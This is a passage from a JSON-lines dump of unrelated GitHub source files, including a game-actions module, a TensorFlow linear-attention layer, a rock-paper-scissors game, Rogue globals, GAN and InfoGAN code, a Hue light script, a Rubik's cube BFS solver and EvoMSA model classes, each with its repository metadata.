@property\n def description_text_name(self):\n return self.meta_action.description_text_name\n\n def get_description_arguments(self):\n hero_2 = self.meta_action.hero_2 if self.hero.id == self.meta_action.hero_1.id else self.meta_action.hero_1\n return {'duelist_1': self.hero,\n 'duelist_2': hero_2}\n\n @property\n def ui_type(self):\n return self.meta_action.TYPE\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id, meta_action):\n return cls( hero=hero,\n bundle_id=bundle_id,\n meta_action_id=meta_action.id,\n state=meta_action.state)\n\n def process(self):\n\n self.meta_action.process()\n\n self.state = self.meta_action.state\n self.percents = self.meta_action.percents\n\n\nclass ActionHealCompanionPrototype(ActionBase):\n\n TYPE = relations.ACTION_TYPE.HEAL_COMPANION\n TEXTGEN_TYPE = 'action_heal_companion'\n HELP_CHOICES = set((HELP_CHOICES.HEAL_COMPANION, ))\n\n HABIT_MODE = relations.ACTION_HABIT_MODE.COMPANION\n\n class STATE(ActionBase.STATE):\n HEALING = 'healing'\n\n def get_description_arguments(self):\n args = super(ActionHealCompanionPrototype, self).get_description_arguments()\n if self.hero.companion:\n args.update({'companion': self.hero.companion})\n return args\n\n ###########################################\n # Object operations\n ###########################################\n\n @classmethod\n def _create(cls, hero, bundle_id):\n prototype = cls( hero=hero,\n bundle_id=bundle_id,\n state=cls.STATE.HEALING)\n hero.companion.on_heal_started()\n hero.add_message('action_heal_companion_start', hero=hero, companion=hero.companion)\n return prototype\n\n def after_processed(self):\n if self.hero.companion is None:\n return\n\n health = self.hero.companion.heal(c.COMPANIONS_HEALTH_PER_HEAL)\n if health > 0:\n self.hero.add_message('action_heal_companion_finish', hero=self.hero, companion=self.hero.companion, health=health)\n else:\n self.hero.add_message('action_heal_companion_finish_without_healing', hero=self.hero, companion=self.hero.companion)\n\n if self.hero.can_companion_exp_per_heal() and random.random() < self.hero.companion_exp_per_heal_probability:\n self.hero.add_experience(c.COMPANIONS_EXP_PER_HEAL, without_modifications=True)\n\n if (self.hero.companion.health < self.hero.companion.max_health and\n self.hero.can_companion_regenerate() and\n random.random() < self.hero.companion_regenerate_probability):\n health = self.hero.companion.heal(utils_logic.randint_from_1(c.COMPANIONS_REGEN_ON_HEAL_AMOUNT))\n self.hero.add_message('companions_regenerate', companion_owner=self.hero, companion=self.hero.companion, health=health)\n\n if (self.hero.companion.health < self.hero.companion.max_health and\n ( (self.hero.companion.type.is_LIVING and random.random() < self.hero.companion_living_heal_probability) or\n (self.hero.companion.type.is_CONSTRUCT and random.random() < self.hero.companion_construct_heal_probability) or\n (self.hero.companion.type.is_UNUSUAL and random.random() < self.hero.companion_unusual_heal_probability) )\n ):\n health = self.hero.companion.heal(utils_logic.randint_from_1(c.COMPANIONS_REGEN_BY_HERO))\n self.hero.add_message('hero_ability_companion_healing', actor=self.hero, companion=self.hero.companion, health=health)\n\n\n def on_heal_companion(self):\n if self.hero.companion is None:\n self.state = self.STATE.PROCESSED\n return\n\n if self.hero.companion.health >= self.hero.companion.max_health:\n self.state = self.STATE.PROCESSED\n\n 
heal_length = f.companions_heal_length(self.hero.companion.health, self.hero.companion.max_health)\n\n self.percents += 1.0 / heal_length\n\n if self.percents >= 1.0 or self.hero.companion.health == self.hero.companion.max_health:\n self.percents = 1\n self.state = self.STATE.PROCESSED\n\n def process(self):\n\n if self.hero.companion is None:\n self.state = self.STATE.PROCESSED\n return\n\n if self.hero.companion.health >= self.hero.companion.max_health:\n self.hero.companion.health = self.hero.companion.max_health\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.HEALING:\n\n heal_length = f.companions_heal_length(self.hero.companion.health, self.hero.companion.max_health)\n\n self.percents += 1.0 / heal_length\n\n if random.uniform(0, 1) < 0.1:\n self.hero.add_message('action_heal_companion_healing', hero=self.hero, companion=self.hero.companion)\n\n if self.percents >= 1.0:\n self.percents = 1\n self.state = self.STATE.PROCESSED\n\n if self.state == self.STATE.PROCESSED:\n self.after_processed()\n\n\n\n\n\nACTION_TYPES = { action_class.TYPE:action_class\n for action_class in discovering.discover_classes(globals().values(), ActionBase) }\n","repo_name":"qqname/the-tale","sub_path":"the_tale/game/actions/prototypes.py","file_name":"prototypes.py","file_ext":"py","file_size_in_byte":76982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"19802726409","text":"\"\"\"\r\nCopyright 2020 Yi Lin(Kyle) Gao\r\n#@title Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# https://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\"\"\"\r\n\r\n\r\nimport tensorflow as tf\r\nfrom helperfunctions import elu\r\n\r\n\r\nclass MultiHeadAttentionCausalMasked(tf.keras.layers.Layer):\r\n \"\"\"LinearAttention Mechanism from Transformers are RNNs: Fast Autoregressive Transformers\r\n with Linear Attention by Angelos Katharopoulos, Apoorv Vyas, Nikolaos Pappas, François Fleuret.\r\n\r\n Uses linear feature maps f to replace the softmax by a kernel k(x,y)->R+,\r\n so that f(x)*f(y) = k(x,y).\r\n\r\n The authors use the elu feature map.\r\n\r\n This version has causal i.e. forward masking. This cannot be implemented in the usual way due to the\r\n Q*K term not existing in isolation in this Linear Attention.\r\n\r\n The authors of the paper implemented causal attention via a triangular tensor product (and its back prop) in C++.\r\n\r\n I have implemented it in a clumsy way, which makes this slower than the usual softmax attention by quite a bit,\r\n by introducing an intermediate step with the dimensions of the Q*K product.\r\n \"\"\"\r\n\r\n \"\"\"NOTE!!! Due to change of dimensionality of the tensor in the intermediate step, 
Use helperfunctions.forward_mask5() and \r\n helperfunctions.padding_mask5() on any transformer which calls this attention layer.\"\"\"\r\n\r\n def __init__(self, d_model, num_heads):\r\n super().__init__()\r\n self.d_model = d_model\r\n self.num_heads = num_heads\r\n\r\n assert d_model % self.num_heads == 0\r\n\r\n self.depth = d_model // self.num_heads\r\n\r\n self.wq = tf.keras.layers.Dense(d_model)\r\n self.wk = tf.keras.layers.Dense(d_model)\r\n self.wv = tf.keras.layers.Dense(d_model)\r\n\r\n self.dense = tf.keras.layers.Dense(d_model)\r\n\r\n def split_heads(self, x, batch_size):\r\n \"\"\"Split the last dimension into (num_heads,depth)\r\n Arguments:\r\n x -- A tokenized sequence (batch_size,seq_len,d_model)\r\n\r\n Returns:\r\n A tokenized sequence with dimensions (batch_size, seq_len, num_heads, depth)\r\n \"\"\"\r\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\r\n return x\r\n\r\n def call(self, q, k, v, mask=None, eps=1e-8):\r\n batch_size = tf.shape(q)[0]\r\n\r\n q = self.wq(q) # (batch_size,len_q, dim_q)\r\n k = self.wk(k) # (batch_size,len_v, dim_q)\r\n v = self.wv(v) # (batch_size,len_v, dim_v)\r\n\r\n q = elu(self.split_heads(q, batch_size)) # (batch_size, seq_len_q, num_heads, depth_q) (m,l,h,d)\r\n k = elu(self.split_heads(k, batch_size)) # (batch_size, seq_len_v, num_heads, depth_q) (m,j,h,d)\r\n v = self.split_heads(v, batch_size) # (batch_size, seq_len_v, num_heads, depth_v) (m,j,h,e)\r\n\r\n k_reduced = tf.math.reduce_sum(k, axis=1) + eps # add eps to avoid division by zero\r\n\r\n z = 1 / (tf.einsum(\"mlhd,mhd->mlh\", q, k_reduced)) # (batch_size, seq_len_q, num_heads)\r\n\r\n output = tf.einsum(\"mjhd,mjhe->mjehd\", k, v) # (batch_size, len_v, depth_v, num_heads, depth_q)\r\n\r\n output = tf.einsum(\"mlhd,mjehd,mlh->mjlhe\", q, output, z) # (batch_size, len_v, len_q, num_heads, depth_v)\r\n\r\n if mask is not None:\r\n output = output * mask # Mask must broadcast to j and l axis correctly\r\n\r\n output = tf.einsum(\"mjlhe->mlhe\", output)\r\n\r\n output = tf.reshape(output, (batch_size, -1, self.num_heads * self.depth)) # (batch_size,len_q, d_model)\r\n return output # (m,l,h*e)","repo_name":"kyle-gao/TF_Transformer","sub_path":"LinearMultiHeadAttentionCausalMasked.py","file_name":"LinearMultiHeadAttentionCausalMasked.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"70612109868","text":"import random\n\nprint(\"PIEDRA PAPEL O TIJERA\")\n\npunmaq=0\npunuser=0\nintentos =0\nn=int(input(\"Cuantas veces desea jugar: \"))\n\nwhile intentos < n:\n maq = random.randint(1,3)\n print(\"Seleccione la opcion\")\n print(\"\"\"1. PIEDRA\n2. PAPEL\n3. 
TIJERA\"\"\")\n us= int(input())\n if us >=1 and us <=3:\n\n if (maq == 1 and us== 2) or (maq==2 and us== 3) or (maq==3 and us== 1):\n punuser +=1\n print(\"Ganaste\")\n elif (maq == 1 and us == 3) or (maq== 2 and us== 1) or (maq== 3 and us== 2):\n punmaq +=1\n print(\"Perdiste\") \n elif maq == us:\n print(\"Empate\")\n punmaq = punmaq\n punuser = punuser\n else:\n print(\"Digito una opcion incorrecta\")\n intentos+=1\n\nprint(f\"puntos Maquina {punmaq}\")\nprint(f\"puntos usuario {punuser}\")","repo_name":"Yurrely28/Piedra-papel-o-tijera-python","sub_path":"juego.py","file_name":"juego.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28039829134","text":"from Rogue import DaemonManager, RogueRandomizer\nfrom enum import IntEnum, IntFlag\n\nwasWizard:bool = True\n\n# for debug\nimport logging\nlogging.basicConfig(filename=\".\\\\data\\\\rogue.log\",level=logging.DEBUG)\nlogger = logging.getLogger()\n\n# score filename\nscoreFilename = \".\\\\data\\\\score.dat\"\nscoreTable = None\n\n# Constant value\nMaxRooms:int = 9\nLevelWhereAmuletExists:int = 25\n\n# System Variables\ncursesLines:int = 0\ncursesColumns:int=0\n\n# managers\nrandomizer = RogueRandomizer()\nrnd = randomizer.next\ndaemonManager:DaemonManager = DaemonManager()\n\n# Things that appear on the screens\nPassage = \"#\"\nDoor = \"+\"\nFloor = \".\"\nPlayer = \"@\"\nTrap = \"^\"\nSecretDoor = \"&\"\nStairs = \"%\"\nGold = \"*\"\nPotion = \"!\"\nScroll = \"?\"\nMagic = \"$\"\nFood = \":\"\nWeapon = \")\"\nArmor = \"]\"\nAmulet = \",\"\nRing = \"=\"\nStick = \"/\"\n\nclass InventryItemTypes(IntEnum):\n DisplayAll = 0\n Callable = -1\n\n# Various flag bits\nclass Flags(IntFlag):\n IsCursed = 2 ** 1\n IsKnow = 2 ** 2\n IsMisl = 2 ** 3\n IsMany = 2 ** 4\n\n IsFound = 2 ** 5\n\n IsBlock = 2 ** 6\n IsRegen = 2 ** 7\n IsMean = 2 ** 8\n IsGreed = 2 ** 9\n IsInvis = 2 ** 10\n\n# Various constants\nBearTime:int = 3\nSleepTime:int = 5\nHoldTime:int = 2\nWanderTime:int = 70\nHuhDuration:int = 20\nSeeDuration:int = 850\nHungerTime:int = 1300\nMoreTime:int = 150\nStomachSize:int = 2000\nBoltLength:int = 6\n\n\n\nrooms = []\nroomGraphDesc = []\nstartPosition = None\n\nstdscr = None\nplayerWindow = None\nhelpWindow = None\nmonsterWindow = None\n\n# initialParameter of magic items\nthings = None\npotionMagic = None\nscrollMagic = None\nringMagic = None\nstickMagic = None\nweapons = None\narmors = None\n\n# monster parameters\nmonsterParameters = []\n\n# things in level of dungeon\nlevelObjectList = [] # List of objects on this level\nlevelMonsterList = [] # List of monsters on the level\ntraps = []\n\n# playing status\nlevel = 1 # What level rogue is on\nntraps = 0 # Number of traps on this level\nnoMove = 0 # Number of turns held in place\nnoCommand = 0 # Number of turns asleep\ninpack = 0 # Number of things in pack\nlastscore = 0 # Score before this turn\nseed = 0 # Random number seed\ncount = 0 # Number of times to repeat command\ndnum = 0 # Dungeon number\nfungHit = 0 # Number of time fungi has hit\nmaxLevel = 25 # Deepest player has gone\ngroup = 0 # Current group number\n\n# Game status\nplayingGame = True # True until he quits\nafter = False # True if we want after daemons\nnotify = False # True if player wants to know\nfightFlush = False # True if toilet input\nslowInvent = False # Inventory one line at a time\naskMe = False # Ask about unidentified things\nhasAmulet = False\n\nhelpList = [\n ( '?', \" prints help\" ),\n ( '/', \" 
identify object\" ),\n ( 'h', \" left\" ),\n ( 'j', \" down\" ),\n ( 'k', \" up\" ),\n ( 'l', \" right\" ),\n ( 'y', \" up & left\" ),\n ( 'u', \" up & right\" ),\n ( 'b', \" down & left\" ),\n ( 'n', \" down & right\" ),\n ( 'H', \" run left\" ),\n ( 'J', \" run down\" ),\n ( 'K', \" run up\" ),\n ( 'L', \" run right\" ),\n ( 'Y', \" run up & left\" ),\n ( 'U', \" run up & right\" ),\n ( 'B', \" run down & left\" ),\n ( 'N', \" run down & right\" ),\n ( 't', \" throw something\" ),\n ( 'f', \" forward until find something\" ),\n ( 'p', \" zap a wand in a direction\" ),\n ( 'z', \" zap a wand or staff\" ),\n ( '>', \" go down a staircase\" ),\n ( 's', \" search for trap/secret door\" ),\n ( ' ', \" (space) rest for a while\" ),\n ( 'i', \" inventory\" ),\n ( 'I', \" inventory single item\" ),\n ( 'q', \" quaff potion\" ),\n ( 'r', \" read paper\" ),\n ( 'e', \" eat food\" ),\n ( 'w', \" wield a weapon\" ),\n ( 'W', \" wear armor\" ),\n ( 'T', \" take armor off\" ),\n ( 'P', \" put on ring\" ),\n ( 'R', \" remove ring\" ),\n ( 'd', \" drop object\" ),\n ( 'c', \" call object\" ),\n ( 'o', \" examine/set options\" ),\n ( \"^L\", \" redraw screen\" ),\n ( \"^R\", \" repeat last message\" ),\n ( \"^[\", \" cancel command\" ),\n ( 'v', \" print program version number\" ),\n ( '!', \" shell escape\" ),\n ( 'S', \" save game\" ),\n ( 'Q', \" quit\" ) \n]","repo_name":"Hajime-Saitou/pyrogue","sub_path":"Global.py","file_name":"Global.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16530427486","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# Use GPU or TPU\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Load your trained generator\nnetG = Generator().to(device)\nnetG.load_state_dict(torch.load('generatorV38.pth'))\nnetG.eval()\n\nfig = plt.figure(figsize=(20, 5))\n\n# Generate and visualize 4 samples with different latent vectors\nfor i in range(4):\n # Generate a random latent vector z with 200 dimensions\n z = torch.randn((1, 200, 1, 1, 1)).to(device)\n #z = torch.randn((1, 200)).to(device)\n\n\n # Generate a 3D voxel data using the generator\n with torch.no_grad():\n generated_data = netG(z).cpu().numpy()\n\n # Reshape the data and visualize it using a 3D plot\n generated_data = generated_data.reshape((64, 64, 64))\n\n ax = fig.add_subplot(1, 4, i+1, projection='3d')\n\n # Find the coordinates of the voxels with values above the threshold (e.g., 0.3)\n coords = np.array(np.nonzero(generated_data > 0.3)).T\n\n # Get the intensity values for each coordinate (used for color)\n intensity = generated_data[generated_data > 0.3]\n\n # Create a scatter plot using the coordinates, with color determined by intensity and a colormap\n ax.scatter(coords[:,0], coords[:,1], coords[:,2], c=intensity, cmap='viridis', marker='o', alpha=0.6)\n\n ax.set_title(f'Sample {i+1}')\n\nplt.show()\n","repo_name":"andros99/3-dimensional-generative-adversarial-network","sub_path":"GAN/showGan.py","file_name":"showGan.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12355412989","text":"from __future__ import print_function\nfrom utils.utils import z_noise, c_noise, make_trainable, ups_conv_bn\nfrom utils.visualization import plot_results_InfoGAN\nfrom keras.models import Model\nfrom keras.layers import *\nfrom 
keras.optimizers import Adam\nfrom keras.utils.np_utils import to_categorical\nfrom models.gan import GAN\nfrom tqdm import tqdm\n\nimport numpy as np\nimport tensorflow as tf\n\nclass InfoGAN(GAN):\n \"\"\" InfoGAN, as per https://arxiv.org/abs/1606.03657\n We base our GAN architecture on a DCGAN model\n \"\"\"\n\n def __init__(self, args):\n GAN.__init__(self)\n self.build_model()\n\n def build_model(self):\n # Input Tensors\n self.input_G = Input(shape=(self.noise_dim,)) # Noise Vector\n self.input_D = Input(shape=self.img_shape) # Image Tensor\n self.conditioning_label = Input(shape=(self.class_dim,)) # One-hot encoded latent code\n\n # Assemble InfoGAN Model using the functional API\n self.G = self.generator(self.input_G, self.conditioning_label)\n self.D = self.discriminator(self.input_D)\n self.Q = self.auxiliary(self.input_D)\n self.G_and_D = Model([self.input_G, self.conditioning_label], self.D(self.output_G)) # D attached to G\n self.G_and_Q = Model([self.input_G, self.conditioning_label], self.Q(self.output_G)) # Q attached to G\n\n # Compile models\n self.D.compile(Adam(10 * self.lr), \"binary_crossentropy\")\n self.G_and_D.compile(Adam(self.lr), \"binary_crossentropy\")\n self.G_and_Q.compile(Adam(self.lr), self.custom_objective_Q(self.input_G, self.conditioning_label))\n\n def train(self, X_train, nb_epoch=10, nb_iter=250, bs=128, y_train=None, save_path='../models/'):\n \"\"\" Train InfoGAN:\n - Train D to discriminate G results, conditioned on label\n - Train G to fool D, conditioned on label\n \"\"\"\n for e in range(nb_epoch):\n print(\"Epoch \" + str(e+1) + \"/\" + str(nb_epoch))\n for i in tqdm(range(nb_iter)):\n # Retrieve discriminator and auxiliary network training data\n X, y, random_z, random_c = self.mixed_data(bs//2, X_train, y_train, self.G)\n # Train discriminator\n self.D.train_on_batch(X,y)\n # Freeze discriminator\n make_trainable(self.D, False)\n make_trainable(self.Q, False)\n # Train generator i.e. 
whole model (G + frozen D)\n self.G_and_D.train_on_batch([z_noise(bs), c_noise(bs)], np.zeros([bs]))\n # Unfreeze discriminator\n make_trainable(self.D, True)\n make_trainable(self.Q, True)\n # Train Auxiliary Network\n self.G_and_Q.train_on_batch([random_z, random_c], np.zeros([bs//2]))\n self.G_and_Q.save_weights(save_path +'InfoGAN_Q' + str(e+1) + '.h5')\n self.G_and_D.save_weights(save_path +'InfoGAN_D' + str(e+1) + '.h5')\n\n def pre_train(self, X_train, y_train):\n \"\"\" Pre-train D for a couple of iterations\n \"\"\"\n print(\"Pre-training D for a couple of iterations...\", end='')\n sz = X_train.shape[0]//200\n # Concatenate real and fake images\n real_images = np.random.permutation(X_train)[:sz]\n fake_images = self.G.predict([z_noise(sz), c_noise(sz)])\n x1 = np.concatenate([real_images, fake_images])\n # Train D\n self.D.fit(x1, [0]*sz + [1]*sz, batch_size=128, nb_epoch=1, verbose=2)\n print(\"done.\")\n\n def mixed_data(self, sz, X_train, y_train, G):\n \"\"\" Generate fake and real data to train D and Q\n \"\"\"\n # Pre-compute random vectors\n permutations = np.random.randint(0,X_train.shape[0],size=sz)\n random_z = z_noise(sz) # Noise input\n random_c = c_noise(sz) # Latent code\n # Sample real images and fake images\n X = np.concatenate((X_train[permutations[:sz]], G.predict([random_z, random_c])))\n return X, [0]*sz + [1]*sz, random_z, random_c\n\n def generator(self, input_G, conditioning_label):\n \"\"\" InfoGAN Generator, small neural network with upsampling and ReLU\n \"\"\"\n # Feed conditioning input into a Dense unit\n x_noise = Dense(128, activation='relu')(input_G)\n x_label = Dense(128, activation='relu')(conditioning_label)\n\n # Concatenate the units and feed to the shared branch\n x = merge([x_noise, x_label], mode='concat')\n x = Dense(512*7*7, activation='relu')(x)\n x = BatchNormalization(mode=2)(x)\n x = Reshape((7, 7, 512))(x)\n # 2 x (UpSampling + Conv2D + BatchNorm) blocks\n x = ups_conv_bn(x, 64, 'relu')\n x = ups_conv_bn(x, 32, 'relu')\n self.output_G = Convolution2D(1, 1, 1, border_mode='same', activation='tanh')(x)\n # Assemble the model\n return Model([input_G, conditioning_label], self.output_G)\n\n def discriminator(self, input_D):\n \"\"\" InfoGAN Discriminator, small neural network with upsampling\n (nb: D is unconditional)\n \"\"\"\n # Create a shared core for D and Q\n x = Convolution2D(256, 5, 5, subsample=(2,2), border_mode='same', input_shape=(28,28,1), activation=LeakyReLU())(input_D)\n self.shared_D_Q = Convolution2D(512, 5, 5, subsample=(2,2), border_mode='same', activation=LeakyReLU())(x)\n x = Flatten()(self.shared_D_Q)\n x = Dense(256, activation=LeakyReLU())(x)\n output_D = Dense(1, activation = 'sigmoid')(x)\n # Assemble the model\n return Model(input_D, output_D)\n\n def auxiliary(self, input_D):\n \"\"\" Auxiliary network Q, to maximize mutual information in latent code\n \"\"\"\n x = Flatten()(self.shared_D_Q)\n x = Dense(256, activation='relu')(x)\n output_Q = Dense(10, activation = 'softmax')(x) # Nb: softmax to match c prior (categorical)\n # Assemble the model\n return Model(input_D, output_Q)\n\n def custom_objective_Q(self, z, c):\n \"\"\" Define proxy objective function, using nested loss function (unused args)\n \"\"\"\n def loss(y_true, y_pred):\n # Conditional entropy Q(c'|z)\n cond_entropy = tf.reduce_mean(-tf.reduce_sum(tf.log(self.G_and_Q([z,c]) + 1e-8) * c, 1))\n # Entropy of latent code H(c)\n lat_entropy = tf.reduce_mean(-tf.reduce_sum(tf.log(c + 1e-8) * c, 1))\n # Total Entropy\n total_entropy = 
tf.cast(cond_entropy, tf.float32) + tf.cast(lat_entropy, tf.float32)\n return total_entropy\n return loss\n\n def visualize(self):\n plot_results_InfoGAN(self.G)\n\n def load_weights(self, path):\n self.G_and_D.load_weights(path)\n self.G_and_Q.load_weights(path.replace('_D', '_Q'))\n","repo_name":"germain-hug/GANs-Keras","sub_path":"models/infogan.py","file_name":"infogan.py","file_ext":"py","file_size_in_byte":6768,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"35288876110","text":"from test_interface1 import env_demo\n\n\nclass TestApi():\n data = {\n \"method\": \"get\",\n \"url\": \"http://abc:9999/demo.txt\",\n \"headers\": None\n }\n\n def test_send(self):\n api = env_demo.Api()\n print(api.send(self.data).text)","repo_name":"dj225625/PycharmProjects_2","sub_path":"test_interface1/test_send.py","file_name":"test_send.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34264126148","text":"#!/usr/bin/env python\nimport time\nimport ConfigParser\nimport json\nimport requests\n\nfrom base64 import b64encode\n\n# Load Settings\nparser = ConfigParser.SafeConfigParser()\nparser.read('config.ini')\n\nLIP = parser.get('Login Parameters', 'LINK_IP')\nLPT = parser.get('Login Parameters', 'LINK_PROTOCOL')\n\nwith open('pulse_up.json') as data_file:\n pulse_up = json.load(data_file)\n\nwith open('pulse_mid.json') as data_file:\n pulse_mid = json.load(data_file)\n\nwith open('pulse_down.json') as data_file:\n pulse_down = json.load(data_file)\n\nwith open('token.json') as data_file:\n data = json.load(data_file)\n\nauthheaders = { 'Authorization' : 'Bearer %s' % data[\"session_token\"] }\nlinkurl = LPT + \"://\" + LIP + \":3000\"\n\nwith open('services.json') as data_file:\n services = json.load(data_file)\n\nwhile True:\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_up)\n time.sleep(0.1)\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_mid)\n time.sleep(0.1)\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_down)\n time.sleep(0.1)\n r=requests.put(linkurl+\"/services/\"+services[0][\"id\"]+\"/state\", headers=authheaders, json=pulse_mid)\n","repo_name":"nhirata/hue_scripts","sub_path":"pulse.py","file_name":"pulse.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40533857094","text":"import unittest\nfrom math import pi\n\ndef circle_area(r):\n # check the type first: comparing a non-number with 0 would raise the wrong exception\n if type(r) not in [int, float]:\n raise TypeError(\"radius is not a number\")\n \n if r < 0:\n raise ValueError(\"radius is less than zero\")\n # calculates the area of a circle\n return pi*(r**2)\n\n# print(circle_area(0))","repo_name":"Godswilleo/unittest","sub_path":"circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31759851661","text":"import rubik\n \n# Let each operator be dict[(perm_seq)]=([op_seq])\n\ndef convertStrStoreToAnswerList(store):\n return [eval('rubik.'+op) for op in store]\n\ndef shortest_path(start, end):\n \"\"\"\n Using 2-way BFS, finds the shortest path from start_position to\n end_position. Returns a list of moves. 
\n\n You can use the rubik.quarter_twists move set.\n Each move can be applied using rubik.perm_apply\n \"\"\"\n if(start==end): return []\n start_set={start:[]}\n end_set={end:[]}\n for i in range(7):\n new_start_set={}\n new_end_set={}\n# do new step\n for pos in start_set:\n last_op_seq=start_set[pos]\n for perm in rubik.quarter_twists:\n new_pos=rubik.perm_apply(perm,pos)\n if(new_start_set.get(new_pos) == None):\n new_start_set[new_pos]=last_op_seq+[rubik.quarter_twists_names[perm]]\n# check key\n for pos in end_set.keys():\n if(new_start_set.get(pos)!=None):\n first_part_answer=convertStrStoreToAnswerList(new_start_set[pos])\n second_part_answer=convertStrStoreToAnswerList(end_set[pos])\n second_part_answer.reverse()\n second_part_answer=[rubik.perm_inverse(p) for p in second_part_answer]\n return first_part_answer+second_part_answer\n# do new step\n for pos in end_set:\n last_op_seq=end_set[pos]\n for perm in rubik.quarter_twists:\n new_pos=rubik.perm_apply(perm,pos)\n if(new_end_set.get(new_pos)==None):\n new_end_set[new_pos]=last_op_seq+[rubik.quarter_twists_names[perm]]\n start_set=new_start_set\n for pos in start_set.keys():\n if(new_end_set.get(pos)!=None):\n first_part_answer=convertStrStoreToAnswerList(new_start_set[pos])\n second_part_answer=convertStrStoreToAnswerList(new_end_set[pos])\n second_part_answer.reverse()\n second_part_answer=[rubik.perm_inverse(p) for p in second_part_answer]\n return first_part_answer+second_part_answer\n end_set=new_end_set\n return None\n#\n#k=rubik.I\n#k=rubik.perm_apply(rubik.F,k)\n#reverse_F=rubik.perm_inverse(rubik.F)\n#k=rubik.perm_apply(reverse_F,k)\n#print(k)","repo_name":"algoflow19/Algorithm","sub_path":"6006/A6/ps6/rubik/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13391708520","text":"n, count = int(input()), 0\nfor i in range(n):\n word = input()\n lst = set()\n Zword = word[0]\n tf = 1\n for Nword in word:\n if Nword != Zword:\n if Nword in lst:\n tf = 0\n break\n lst.add(Zword)\n Zword = Nword\n count += tf\nprint(count)","repo_name":"haggy06/baekjoon-python","sub_path":"level_6/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27330274390","text":"from typing import Union\nfrom microtc.utils import save_model, tweet_iterator, SparseMatrix\nfrom b4msa.textmodel import TextModel\nfrom EvoMSA.ConceptModelling.thumbs_up_down import ThumbsUpDown, _ARABIC, _ENGLISH, _SPANISH, PATH as ConPATH\nfrom scipy.stats import multivariate_normal\nfrom scipy.special import logsumexp\nfrom sklearn.svm import LinearSVC\nimport numpy as np\nimport os\n\n\nclass BaseTextModel(object):\n \"\"\"Base class for text model\n\n :param corpus: Text to build the text model\n :type corpus: list or dict\n \"\"\"\n\n def __init__(self, corpus=None, **kwargs):\n pass\n\n def fit(self, X):\n \"\"\"\n Train the model\n\n :param X: Corpus\n :type X: list\n :rtype: instance\n \"\"\"\n\n pass\n\n def __getitem__(self, x):\n pass\n\n def tokenize(self, text):\n pass\n\n def transform(self, X):\n return np.array([self.__getitem__(x) for x in X])\n\n\nclass BaseClassifier(object):\n \"\"\"Base class for the classifier\"\"\"\n\n def __init__(self, random_state=0):\n pass\n\n def fit(self, X, y):\n\n \"\"\"Method to train the classifier\n :param X: Independent variable\n :type X: np.array or 
csc_matrix\n :param y: Dependent variable\n :type y: np.array\n :rtype: self\n \"\"\"\n\n return self\n\n def decision_function(self, X):\n \"\"\"Classifier's decision function\n\n :param X: Independent variable\n :type X: np.array or csc_matrix\n :rtype: np.array\n \"\"\"\n\n pass\n\n\nclass OutputClassifier(object):\n \"\"\"LinearSVC that outputs the training set and test set using the environment variable OUTPUT\"\"\"\n\n def __init__(self, random_state=0, output=None):\n self._output = os.getenv('OUTPUT', output)\n assert self._output is not None\n self._random_state = random_state\n\n def fit(self, X, y):\n self.m = LinearSVC(random_state=self._random_state).fit(X, y)\n try:\n X = np.array(X.todense())\n except AttributeError:\n pass\n with open('%s_train.csv' % self._output, 'w') as fpt:\n for x, _y in zip(X, y):\n fpt.write(\",\".join([str(_) for _ in x]))\n fpt.write(\",%s\\n\" % str(_y))\n return self\n\n def decision_function(self, X):\n hy = self.m.decision_function(X)\n try:\n X = np.array(X.todense())\n except AttributeError:\n pass\n with open('%s_test.csv' % self._output, 'w') as fpt:\n for x in X:\n fpt.write(\",\".join([str(_) for _ in x]))\n fpt.write(\"\\n\")\n return hy\n\n\nclass EvoMSAWrapper(BaseTextModel):\n def __init__(self, evomsa=None):\n assert evomsa is not None\n evomsa.n_jobs = 1\n self._evomsa = evomsa\n\n def transform(self, X):\n return self._evomsa.predict_proba(X)\n\n\nclass SVCWrapper(object):\n \"\"\"Wrapper to the LinearSVC class\n >>> from EvoMSA.model import SVCWrapper\n 